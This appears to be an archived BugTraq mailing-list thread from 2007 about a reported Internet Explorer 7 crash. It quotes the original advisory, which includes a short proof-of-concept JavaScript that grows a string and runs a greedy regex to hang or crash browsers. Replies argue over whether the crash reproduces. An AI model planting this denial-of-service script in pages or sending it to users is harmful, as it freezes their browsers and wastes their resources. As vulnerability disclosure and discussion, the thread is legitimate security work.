BugTraq
Re: Internet Explorer Crash Apr 17 2007 09:09PM
Thor (Hammer of God) (thor hammerofgod com) (1 replies)
Re: Internet Explorer Crash Apr 18 2007 04:12PM
Tom Gregory (sick minded gmail com) (1 replies)
Actually Yes, the PoC crashing my IE, make it hang and my CPU usage goes
to 100%, and i'm using Internet Explorer 7.0.5730.11 like he said.

Tom

Thor (Hammer of God) wrote:
> Actually, I just get a message that says "A script on this page is
> causing Internet Explorer to run slowly." But my CPU usage for
> iexplore.exe is only at 20, and my system didn't slow down in the
> least. I went ahead and told IE to continue to run the script, and pops
> up again in a bit asking me the same thing. Finally bored, I say "no"
> and it immediately came up with "Goodbye" on the page.
>
> If this actually makes Safari and Konqueror crash, why the "stop using
> Microsoft products" recommendation? At least IE is smart enough to tell
> me that your little "stupidInternetExploder" script is being pesky.
>
> t
>
> ----- Original Message ----- From: "J. Oquendo" <sil (at) infiltrated (dot) net [email concealed]>
> To: <bugtraq (at) securityfocus (dot) com [email concealed]>
> Sent: Tuesday, April 17, 2007 10:09 AM
> Subject: Internet Explorer Crash
>
>
>>
> Product: Internet Explorer Version 7.0.5730.11
> Impact: Browser crash possibly more
> Author: Jesus Oquendo
> echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
>
>
> I. BACKGROUND
> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
>
> II. DESCRIPTION
> IE 7 is vulnerable to a script which causes the browser to hang. The
> memory and CPU usage go through the roof. Originally the script caused
> (and still causes) Safari and Konqueror to crash.
>
> III SOLUTION
> Stop using Microsoft products or deal with a new advisory every other
> day.
>
> IV. Proof
> http://www.infiltrated.net/stupidInternetExploder.html
>
> V. Code
>
> $ more /stupidInternetExploder.html
>
> <script>
>
> var reg = /(.)*/;
>
> var z = 'Z';
> while (z.length <=
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999
>
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
>
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
>
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
>
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999)
> z+=z;
> var boum = reg.exec(z);
>
> </script>
>
> Goodbye
>
>
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> sil . infiltrated @ net http://www.infiltrated.net
> The happiness of society is the end of government.
> John Adams
>
>
>>
>>

[ reply ]
Re: Internet Explorer Crash Apr 18 2007 08:14PM
Rob Bartlett (Rob Bartlett Sun COM) (2 replies)
Re: Internet Explorer Crash Apr 19 2007 07:47AM
"C. Bergström" (cbergstrom netsyncro com)
Re: Internet Explorer Crash Apr 19 2007 04:00AM
Kevin Finisterre (lists) (kf_lists digitalmunition com) (1 replies)
Re: Internet Explorer Crash Apr 19 2007 03:55PM
Dave Walker (walker altair com)


 

Privacy Statement
Copyright 2010, SecurityFocus